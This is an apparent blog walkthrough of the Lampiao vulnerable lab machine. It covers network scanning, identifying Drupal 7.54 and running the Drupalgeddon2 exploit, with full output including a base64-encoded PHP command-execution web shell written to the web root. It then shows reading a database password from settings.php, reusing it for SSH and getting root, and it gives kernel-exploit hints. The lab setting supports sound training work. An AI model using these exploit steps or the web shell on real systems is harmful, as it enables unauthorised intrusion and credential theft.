21 Nov 2018

Lampiao Penetration Test Walkthrough

Penetration Test

Lampiao penetration Test walkthrough

Here is a simple walkthrough to conduct a penetration test on the Lampiao machine by Tiago Tavares.

First thing open a CherryTree project, where you are going to save all your evidences. This will be of great help when you will have finished and you’ll be up to the mostly boring part of writing the report. I had to redo the penetration test in order to collect all the evidences needed to write the documentation.

The way to organize the nodes on CherryTree is up to you.

CherryTree

First of all let’s start identifiyng the IP address of the target machine.

user@kali:~$ netdiscover -r 192.168.1.0/24

and below you can see our target: 192.168.1.85. Please note that the “Microsoft Corporation” information comes from the machine beeing virtualized on a Hyper-V box.

Currently scanning: 192.168.26.0/16   |   Screen View: Unique Hosts

1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 42
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.85    00:15:5d:75:55:02      1      42  Microsoft Corporation

Second step, let’s have a look at the ports open. Since we are conducting a penetration test there is no need to be “quiet”, so let’s shoot nmap on all the ports.

root@kali:~# nmap -p 1-65535 192.168.1.85
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-21 10:46 CET
Nmap scan report for 192.168.1.85
Host is up (0.00024s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 00:15:5D:75:55:02 (Microsoft)

Nmap done: 1 IP address (1 host up) scanned in 9.01 seconds

Please note that running without the -p flag nmap reports only the well known ports, which in this case are 22 and 80 (ssh and http).

Ok now let’s have a look at port 80 …

Lampiao fake website

Hmm looks like nothing interesting here … apart from the “morenji has been here” which is not included in the orignal vm image, but it’s a greeting to my fellow colleagues still working on the machine.

Now let’s look at the 1898 port.

"Lampiao Drupal Home Page"

Ok this is a complete website. My first attempt has been to fire OWASP ZAP at it. I had found several misconfigurations of the web server like directory listings enabled. But apart from that, nothing useful. sqlmap yield no better results. Browsing the website however you can notice that there are a couple of posts. One is from user “Tiago” and the other is from user “Eder”. Let’s keep in mind that machines are configured by humans, after all.

One interesting file which is accessible is the CHANGELOG.txt which states drupal version. Please note that the accessibility of CHANGELOG.txt file is by design and is not a misconfiguration. Why? The story goes roughly this way:

  • Most of attacks are from bots, and they shoot at your site whatever they have, regardless to the CMS installed or its version, so hiding it is not useful.
  • The other attacks, i.e. the ones which are specifically targeted to your site, have better ways to determine what you are running whithout creating much noise, so again hiding it is not useful.

Anyway we now know the target machine is running Drupal version 7.54:

Drupal 7.54

Let’s move on, and let’s see if we have something more specifically targeted to this CMS. We can use the exploitdb which is installed by default in Kali Linux.

user@kali:~$ searchsploit drupal
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                      |  Path
                                                                                                                                                                                                    | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.0 - News Message HTML Injection                                                                                                                                                            | exploits/php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                                                                                                               | exploits/php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                                                                                                       | exploits/php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                                                                                                         | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                                                                                                       | exploits/php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                                                                                                             | exploits/php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                                                                                                                | exploits/php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                                                                                                              | exploits/php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                                                                                                   | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                                                                                                    | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                                                                                                         | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                                                                                                         | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                                                                                                            | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                                                                                                              | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                                                                                                  | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                                                                                                             | exploits/php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                                                                                                               | exploits/php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                                                                                                       | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                                                                                                   | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                            | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                                                         | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                 | exploits/php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                             | exploits/php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                    | exploits/php/webapps/44448.py
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                                                                                                                      | exploits/php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                                                                                                             | exploits/php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                                                                                                                   | exploits/php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                                                              | exploits/php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                                                                                                     | exploits/php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                                                       | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                                                                                                             | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                                                                                                      | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities                                                                                        | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                                                                   | exploits/php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                                                                                                                       | exploits/php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                                                                                                             | exploits/php/webapps/33410.txt
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                                                                   | exploits/php/webapps/44501.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
user@kali:~$

One raw (exploit) looks interesting, and it is the infamous Drupalgeddon2 ;) Let’s give it a shot.

user@kali:~$ ruby /usr/share/exploitdb/exploits/php/webapps/44449.rb http://192.168.1.85:1898
ruby: warning: shebang line ending with \r may cause problems
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[*] Target : http://192.168.1.85:1898/
--------------------------------------------------------------------------------
[+] Found  : http://192.168.1.85:1898/CHANGELOG.txt (200)
[+] Drupal!: 7.54
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[*] Payload: echo UBOQZSMV
[+] Result : UBOQZSMV
[{"command":"settings","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"IoYX9sQTS_U7pTnp-E9YIbpEmYR7FF0wJSJ7IL_9edY"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"IoYX9sQTS_U7pTnp-E9YIbpEmYR7FF0wJSJ7IL_9edY"}}}]
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: File Write To Web Root (./)
[*] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./s.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }[{"command":"settings","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"hGG1vki-ijk-YlOz1WyKRSQfA5ujfUBAIdYF8QIxBHM"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"hGG1vki-ijk-YlOz1WyKRSQfA5ujfUBAIdYF8QIxBHM"}}}]
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[*] Fake shell:   curl 'http://192.168.1.85:1898/s.php' -d 'c=whoami'
lampiao>>

Oh yeah! We got a shell. Beeing a RCE via web, the user we are is www-data which is an unprivileged user. Before moving on, you can notice that you are not on a fully fledged tty. Now you have two alternatives.

  • Mainly you can use nc and/or python to start a remote shell back to you, or
  • you can find more information and try to get in from the main door.

If you are interested at the first option, you can have a look at this post. I went for the second one, and try to use a little social engineering combined with -always useful- luck.

Since I am curious (and I have some experience on how people tend to choose and reuse the same password all round) I wanted to see how Drupal connects to the MySql database. Locate the settings and grep for the password.

lampiao>> locate settings.php
/var/www/html/sites/default/default.settings.php
/var/www/html/sites/default/settings.php
/var/www/html/themes/garland/theme-settings.php
lampiao>> cat /var/www/html/sites/default/settings.php|grep password
 *   'password' => 'password',
 * username, password, host, and database name.
 *   'password' => 'password',
 *   'password' => 'password',
 *     'password' => 'password',
 *     'password' => 'password',
      'password' => 'Virgulino',
 * by using the username and password variables. The proxy_user_agent variable
# $conf['proxy_password'] = '';
lampiao>>

Let’s see if the password “Virgulino” is the same for ssh tiago user… ;)

user@kali:~$ ssh tiago@192.168.1.85
tiago@192.168.1.85's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Nov 20 14:34:43 BRST 2018

  System load:  0.0               Processes:           114
  Usage of /:   8.2% of 19.07GB   Users logged in:     0
  Memory usage: 23%               IP address for eth0: 192.168.1.85
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Tue Nov 20 14:34:43 2018 from 192.168.1.1

tiago@lampiao:~$

An interesting alternative is the approach used by Kamran Saifullah and described in his article. Basically brute forcing with information extracted from the same website. Cool!

If you want to get root you have to do some privilege escalation. There are various enumerators out there. After searching for obvious misconfiguration, and finding none, my choice has been to focus on kernel vulnerabilities. I used kernelpop.

Beware that kernel exploits are dangerous and some of them will kernel panic the machine. Don’t use them on production machines. Now the rest is an exercise left to you, but I’ll give three hints:

  • target machine’s architecture is 32bit. Avoid 64bit exploits, they won’t work.
  • you probably will have to stabilize the exploit, since after some seconds after the exploit is run the kernel panics. See exploit description on how to do it.
  • if something goes wrong, reboot the machine and start again. There is no sense in wasting time exploiting a kernel which is already instable.

Happy hacking!

root@lampiao:/root# cat flag.txt
9740616875908d91ddcdaa8aea3af366
root@lampiao:/root#